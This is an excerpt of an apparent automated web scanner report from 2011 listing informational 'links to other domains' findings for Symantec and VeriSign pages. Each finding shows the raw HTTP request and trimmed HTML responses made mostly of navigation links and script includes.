<a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit">Performance Toolkit</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/simple-backup/" title="Simple Backup">Simple Backup</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/file-recover/" title="File Recovery">File Recovery</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor">Spyware Doctor</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian">Privacy Guardian</a>
...[SNIP]...
<li>
<a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus">Free Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/password-manager/" title="Password Manager">Password Manager</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic">Registry Mechanic</a>
...[SNIP]...

14.63. http://www.symantec.com/store/services/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /store/services/index.jsp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /store/services/index.jsp?inid=us_pagenotfound_smb_store HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 25519
Cache-Control: public, max-age=3530
Date: Fri, 09 Sep 2011 21:31:13 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Store Services - Symantec Corp.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta
...[SNIP]...
<li>
<a href="http://us.norton.com/antivirus/" title="AntiVirus">AntiVirus</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/ghost/" title="Backup Software">Backup Software</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/internet-security/" title="Internet Security">Internet Security</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/malware.jsp" title="Malware">Malware</a>
...[SNIP]...
<li>
<a href="http://www.backup.com/" title="Online Backup">Online Backup</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing">Phishing</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware">Spyware</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/" title="Virus Protection">Virus Protection</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal">Virus Removal</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan">Virus Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL">SSL</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates">SSL Certificates</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation">Extended Validation</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal">VeriSign Trust Seal</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication">Two-Factor Authentication</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection">Identity Protection</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan">Malware Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/code-signing/index.html" title="Code Signing">Code Signing</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure">Public Key Infrastructure</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI">PKI</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus">Spyware Doctor with Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit">Performance Toolkit</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/simple-backup/" title="Simple Backup">Simple Backup</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/file-recover/" title="File Recovery">File Recovery</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor">Spyware Doctor</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian">Privacy Guardian</a>
...[SNIP]...
<li>
<a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus">Free Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/password-manager/" title="Password Manager">Password Manager</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic">Registry Mechanic</a>
...[SNIP]...

14.64. http://www.verisign.ch/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?tid=header-logo HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621600|session#1315621535113-743172#1315623400; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.2.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 31344

<!DOCTYPE html>
<html lang="">
   <head>
       <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=7" />
       <link rel="shortcut icon" href="http://cdn.verisign.com/authweb/global/assets/shared/images/favicon.ico" type="image/x-icon" />

       
       <script type="text/javascript">
...[SNIP]...
</script>

       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"></script>
       <link href="http://cdn.verisign.com/authweb/global/assets/shared/css/shared.css" rel="stylesheet" />

       <!--[if IE 6]>
...[SNIP]...
<![endif]-->

               
       <link href="http://cdn.verisign.com/authweb/global/assets/home/css/home.css" rel="stylesheet" />

       <!--[if IE 6]>
...[SNIP]...
<![endif]-->
       <link rel='stylesheet' href='http://cdn.verisign.com/authweb/en_ch/assets/home/css/en_ch_home.css' />        
   </head>
...[SNIP]...
<!--HEADER ASSETS-->
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       <!--[if lte IE 7]>
...[SNIP]...
<a href="/?tid=header-logo" title="Now from Symantec - VeriSign Authentication Services"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_symc-auth_logo.png" /></a>
...[SNIP]...
<li><a href='//www.verisign.com/ar/'>Argentina</a>
...[SNIP]...
<li><a href='//www.verisign.com.au/'>Australia</a>
...[SNIP]...
<li><a href='//www.verisign.com.br/'>Brazil</a>
...[SNIP]...
<li><a href='//www.verisign.com/ca/'>Canada</a>
...[SNIP]...
<li><a href='//www.verisign.com/cl/'>Chile</a>
...[SNIP]...
<li><a href='//www.verisignchina.com.cn/'>China</a>
...[SNIP]...
<li><a href='//www.verisign.com.hk/'>Hong Kong</a>
...[SNIP]...
<li><a href='//www.verisign.co.jp/'>Japan</a>
...[SNIP]...
<li><a href='//www.verisign.com/latinamerica/esp/'>Latin America</a>
...[SNIP]...
<li><a href='//www.verisign.com/mx/'>Mexico</a>
...[SNIP]...
<li><a href='//www.verisign.com/nl/'>Netherlands</a>
...[SNIP]...
<li><a href='//www.verisign.co.nz/'>New Zealand</a>
...[SNIP]...
<li><a href='//www.verisign.com.sg/'>Singapore</a>
...[SNIP]...
<li><a href='//www.verisign.com.tw/'>Taiwan</a>
...[SNIP]...
<li><a href='//www.verisign.com/'>United States</a>
...[SNIP]...
<li><a href='//www.verisign.co.uk/'>United Kingdom</a>
...[SNIP]...
<div id="header_seal">
                       <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.verisign.ch&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
                       <noscript>
                           <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100">
                               <param name="movie" value="https://seal.verisign.com/getseal?at=1&amp;sealid=2&amp;dn=www.verisign.ch&amp;lang=en">
...[SNIP]...
<param name="allowScriptAccess" value="always">
                               <embed src="https://seal.verisign.com/getseal?at=1&amp;sealid=2&amp;dn=www.verisign.ch&amp;lang=en" loop="false" menu="false" quality="best" wmode="transparent" swliveconnect="FALSE" name="s_s" type="application/x-shockwave-flash" pluginspage="https://www.macromedia.com/go/getflashplayer" allowscriptaccess="always" align="" height="72" width="100"/>
                           </object>
...[SNIP]...
<li><a href='//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps'>Two-Factor Authentication</a>
...[SNIP]...
<li><a href='//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps'>Public Key Infrastructure (PKI) Services</a>
...[SNIP]...
<li><a href='//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps'>Digital IDs for Secure Email</a>
...[SNIP]...
<li><a href='//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to'>Detect Fraud Online</a>
...[SNIP]...
<a href="/ssl/free-trial/index.html?tid=gnps-promo" class="promo-link"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" width="170" height="183" /></a>
...[SNIP]...
<p class="small"><a rel="external" href="//verisign.com/partnersupport/worldwide/partnersupport.html">Email support for login help.</a>
...[SNIP]...
</div>
   <a href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo" class="promo-link"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg" alt="See all Featured SSL Partners" width="170" height="231" /></a>
...[SNIP]...
<li><a href='https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport'>SSL Certificates Support</a>
...[SNIP]...
<li><a href='https://knowledge.verisign.ch/support/trust-seal-support/index.html?tid=gnpsupport'>VeriSign Trust&trade; Seal Support</a>
...[SNIP]...
<li><a href='https://knowledge.verisign.ch/support/code-signing-support/index.html?tid=gnpsupport'>Code Signing Support</a>
...[SNIP]...
<li><a href='https://knowledge.verisign.ch/support/digital-id-support/index.html?tid=gnsupport'>Digital IDs for Secure Email Support</a>
...[SNIP]...
<li><a href='https://knowledge.verisign.ch/support/mpki-support/index.html?tid=gnsupport'>Managed PKI Support</a>
...[SNIP]...
</div>
   <a href="https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport-promo" class="promo-link"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." width="170" height="183" /></a>
...[SNIP]...
<li><a href='https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH'>VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href='https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH'>VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href='https://cc-admin.geotrust.com/geocenter/reseller/logon.do'>Code Signing Portal for Microsoft Windows Mobile Sign In</a>
...[SNIP]...
<li><a href='https://products.verisign.com/geocenter/reseller/logon.do'>VeriSign Partner Center Sign In</a>
...[SNIP]...
<div class="buttondiv-ie"><a class="trybutton" href="https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial?productType=HASGCServer&application_locale=VRSN_CH"><span>
...[SNIP]...
<div class="ab_cell"><a class="accelbtn" href="https://trust-center.verisign.com/process/retail/trust_initial?application_locale=VRSN_CH"><span class="ab_buybtn">
...[SNIP]...
</a>&nbsp;<a href="https://trust-center.verisign.com/process/retail/trust_initial?application_locale=VRSN_CH">VeriSign Trust Seal</a>
...[SNIP]...
<div class="ab_cell"><a class="accelbtn" href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"><span class="ab_signinbtn">
...[SNIP]...
</a>&nbsp;<a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH">VeriSign Trust Center</a>
...[SNIP]...
<a href='/ssl/ssl-information-center/increase-traffic-conversion/index.html?tid=hp_promo' ><img src='http://cdn.verisign.com/authweb/global/assets/shared/images/shoppingcart.png' alt="VeriSign Trusted" height='84' /></a>
...[SNIP]...
<a href='/ssl/ssl-information-center/diginotar-breach-alert/index.html' ><img src='http://cdn.verisign.com/authweb/global/assets/shared/images/hp-promo-fingerprint.png' alt="SSL Security Breaking News." height='84' /></a>
...[SNIP]...
<a class='promo_img' href='/verisigninc' rel='external'><img src='http://cdn.verisign.com/authweb//en_ch/assets/home/images/verisign_inc_promo_home.png' alt='Discover the brand new look of Verisign - Domain Name Services, Network Intelligence and DNS Availability are now at http://www.verisigninc.com/en_CH/index.xhtml'></a>
...[SNIP]...
<li><a href='http://www.symantec.com/de/ch/about/news/release/index.jsp'>News</a></li><li><a href='//blogs.verisign.com/?tid=footer'>Blogs</a>
...[SNIP]...
<li><a href='//www.verisign.com/verisign-worldwide/index.html?tid=footer'>Worldwide Sites</a>
...[SNIP]...
<p>VeriSign Authentication Services, now part of <a href='http://www.symantec.com' rel='external'>Symantec Corp.</a>
...[SNIP]...
</a>, <a href='//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html'>two-factor authentication</a>, <a href='//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html'>identity protection</a>
...[SNIP]...
</a> and <a href='//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps'>public key infrastructure</a> (<a href='//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html'>PKI</a>). Symantec products include <a href='http://ch.norton.com/'>Norton AntiVirus software</a>, <a href='http://smallbusiness.norton.com'>Norton Internet Security solutions for small business</a>, and <a href='http://www.pctools.com/de/'>PC Tools</a>
...[SNIP]...
</div>
       
       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js"></script>
       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911"></script>

                   <script type="text/javascript" src="http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js"></script>
...[SNIP]...
</script>
       
       
       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/home/js/home.js?071211"></script>
       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js"></script>
...[SNIP]...

14.65. http://www.verisign.ch/contact-information/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /contact-information/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /contact-information/index.html?tid=footer HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 39107

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="stylesheet" href="/assets/corp/css/corp_generic_st
...[SNIP]...
<!--HEADER ASSETS-->
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       <!--[if lte IE 7]>
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=7" />
       <link rel="shortcut icon" href="http://cdn.verisign.com/authweb/global/assets/shared/images/favicon.ico" type="image/x-icon" />

       
       <script type="text/javascript">
...[SNIP]...
</script>

       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"></script>
       <link href="http://cdn.verisign.com/authweb/global/assets/shared/css/shared.css" rel="stylesheet" />

       <!--[if IE 6]>
...[SNIP]...
<a href="/?tid=header-logo" title="Now from Symantec - VeriSign Authentication Services"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_symc-auth_logo.png" /></a>
...[SNIP]...
<li><a href='//www.verisign.com/ar/'>Argentina</a>
...[SNIP]...
<li><a href='//www.verisign.com.au/'>Australia</a>
...[SNIP]...
<li><a href='//www.verisign.com.br/'>Brazil</a>
...[SNIP]...
<li><a href='//www.verisign.com/ca/'>Canada</a>
...[SNIP]...
<li><a href='//www.verisign.com/cl/'>Chile</a>
...[SNIP]...
<li><a href='//www.verisignchina.com.cn/'>China</a>
...[SNIP]...
<li><a href='//www.verisign.com.hk/'>Hong Kong</a>
...[SNIP]...
<li><a href='//www.verisign.co.jp/'>Japan</a>
...[SNIP]...
<li><a href='//www.verisign.com/latinamerica/esp/'>Latin America</a>
...[SNIP]...
<li><a href='//www.verisign.com/mx/'>Mexico</a>
...[SNIP]...
<li><a href='//www.verisign.com/nl/'>Netherlands</a>
...[SNIP]...
<li><a href='//www.verisign.co.nz/'>New Zealand</a>
...[SNIP]...
<li><a href='//www.verisign.com.sg/'>Singapore</a>
...[SNIP]...
<li><a href='//www.verisign.com.tw/'>Taiwan</a>
...[SNIP]...
<li><a href='//www.verisign.com/'>United States</a>
...[SNIP]...
<li><a href='//www.verisign.co.uk/'>United Kingdom</a>
...[SNIP]...
<div id="header_seal">
                       <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.verisign.ch&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
                       <noscript>
                           <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100">
                               <param name="movie" value="https://seal.verisign.com/getseal?at=1&amp;sealid=2&amp;dn=www.verisign.ch&amp;lang=en">
...[SNIP]...
<param name="allowScriptAccess" value="always">
                               <embed src="https://seal.verisign.com/getseal?at=1&amp;sealid=2&amp;dn=www.verisign.ch&amp;lang=en" loop="false" menu="false" quality="best" wmode="transparent" swliveconnect="FALSE" name="s_s" type="application/x-shockwave-flash" pluginspage="https://www.macromedia.com/go/getflashplayer" allowscriptaccess="always" align="" height="72" width="100"/>
                           </object>
...[SNIP]...
<li><a href='//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps'>Two-Factor Authentication</a>
...[SNIP]...
<li><a href='//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps'>Public Key Infrastructure (PKI) Services</a>
...[SNIP]...
<li><a href='//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps'>Digital IDs for Secure Email</a>
...[SNIP]...
<li><a href='//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to'>Detect Fraud Online</a>
...[SNIP]...
<a href="/ssl/free-trial/index.html?tid=gnps-promo" class="promo-link"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" width="170" height="183" /></a>
...[SNIP]...
<p class="small"><a rel="external" href="//verisign.com/partnersupport/worldwide/partnersupport.html">Email support for login help.</a>
...[SNIP]...
</div>
   <a href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo" class="promo-link"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg" alt="See all Featured SSL Partners" width="170" height="231" /></a>
...[SNIP]...
<li><a href='https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport'>SSL Certificates Support</a>
...[SNIP]...
<li><a href='https://knowledge.verisign.ch/support/trust-seal-support/index.html?tid=gnpsupport'>VeriSign Trust&trade; Seal Support</a>
...[SNIP]...
<li><a href='https://knowledge.verisign.ch/support/code-signing-support/index.html?tid=gnpsupport'>Code Signing Support</a>
...[SNIP]...
<li><a href='https://knowledge.verisign.ch/support/digital-id-support/index.html?tid=gnsupport'>Digital IDs for Secure Email Support</a>
...[SNIP]...
<li><a href='https://knowledge.verisign.ch/support/mpki-support/index.html?tid=gnsupport'>Managed PKI Support</a>
...[SNIP]...
</div>
   <a href="https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport-promo" class="promo-link"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." width="170" height="183" /></a>
...[SNIP]...
<li><a href='https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH'>VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href='https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH'>VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href='https://cc-admin.geotrust.com/geocenter/reseller/logon.do'>Code Signing Portal for Microsoft Windows Mobile Sign In</a>
...[SNIP]...
<li><a href='https://products.verisign.com/geocenter/reseller/logon.do'>VeriSign Partner Center Sign In</a>
...[SNIP]...
<li><a href="//www.symantec.com/de/ch/about/news/release/index.jsp">News</a>
       <ul>
           <li><a href="//press.verisign.com/">Press Release Archives</a>
...[SNIP]...
<li><a href="//www.verisign.com/press/awards/index.html">Awards</a></li>
   <li><a href="//blogs.verisign.com/">Blogs</a></li>
<li><a href="//www.verisign.com/verisign-worldwide/index.html">Worldwide Sites</a>
...[SNIP]...
<div id="emailPrint" class="emailPrint">
<a class="addthis_button_email" href="//www.addthis.com/bookmark.php?v=250"><img style="margin-bottom: 0px;" src="/assets/shared/images/dev044079.gif" alt="Email">
...[SNIP]...
</script>
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign">
</script>
...[SNIP]...
<p>
               VeriSign Authentication Services, now part of <a href="//www.symantec.com">Symantec Corp.</a>
...[SNIP]...
<p>For billing address and payment information please <a href="https://knowledge.verisign.ch/support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601">click here</a>
...[SNIP]...
<br />
                           For billing address and payment information please <a href="https://knowledge.verisign.ch/support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601">click here</a>
...[SNIP]...
<br /><a href="//www.verisign.com/support/ssl-certificates-support/secure-site-seal/abuse.html">Report VeriSign Seal Abuse</a>
...[SNIP]...
<br/>
                                   <a href="http://www.verisign.co.uk/"><strong>
...[SNIP]...
<br />
   or <a href="https://www.verisign.com/cgi-bin/go.cgi?a=w18450112575241018">submit an enquiry online</a>
...[SNIP]...
<div class="im" style="margin: 0px 0px 12px;">
<a id="a_imlinks" name="a_imlinks" class="imlinks" href="https://press.verisign.com/easyir/customrel.do?easyirid=AFC0FF0DB5C560D3&version=live&prid=458311&releasejsp=custom_97"><img id="imgOne" src="/assets/corp/images/corp_promo_awards_3.gif" alt="Awards 2009" title="Awards 2009"/>
...[SNIP]...
</div>
   <a style="display:block" href="//www.verisigninc.com/en_CH/index.xhtml?loc=en_CH" rel="external">
<img src="/assets/naming/images/Naming_rightPromo.gif" alt="Discover the Brand New Look of Verisign - Domain Name Services, Network Intelligence, and DNS Availability are now at verisigninc.com"/>
...[SNIP]...
<!--HEADER ASSETS-->
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       <!--[if lte IE 7]>
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=7" />
       <link rel="shortcut icon" href="http://cdn.verisign.com/authweb/global/assets/shared/images/favicon.ico" type="image/x-icon" />

       
       <script type="text/javascript">
...[SNIP]...
</script>

       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"></script>
       <link href="http://cdn.verisign.com/authweb/global/assets/shared/css/shared.css" rel="stylesheet" />

       <!--[if IE 6]>
...[SNIP]...
<li><a href='http://www.symantec.com/de/ch/about/news/release/index.jsp'>News</a></li><li><a href='//blogs.verisign.com/?tid=footer'>Blogs</a>
...[SNIP]...
<li><a href='//www.verisign.com/verisign-worldwide/index.html?tid=footer'>Worldwide Sites</a>
...[SNIP]...
<p>VeriSign Authentication Services, now part of <a href='http://www.symantec.com' rel='external'>Symantec Corp.</a>
...[SNIP]...
</a>, <a href='//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html'>two-factor authentication</a>, <a href='//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html'>identity protection</a>
...[SNIP]...
</a> and <a href='//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps'>public key infrastructure</a> (<a href='//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html'>PKI</a>). Symantec products include <a href='http://ch.norton.com/'>Norton AntiVirus software</a>, <a href='http://smallbusiness.norton.com'>Norton Internet Security solutions for small business</a>, and <a href='http://www.pctools.com/de/'>PC Tools</a>
...[SNIP]...
</div>

       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js"></script>
       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911"></script>

                   <script type="text/javascript" src="http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://cdn.verisign.com/assets/shared/js/curvycorners.js"></script>
...[SNIP]...

14.66. http://www.verisign.ch/corporate/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /corporate/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /corporate/index.html?tid=footer HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621596|session#1315621535113-743172#1315623396; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.1.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 36193

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<script type="text/JavaScript" src="http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js" language="JavaScript"></script>

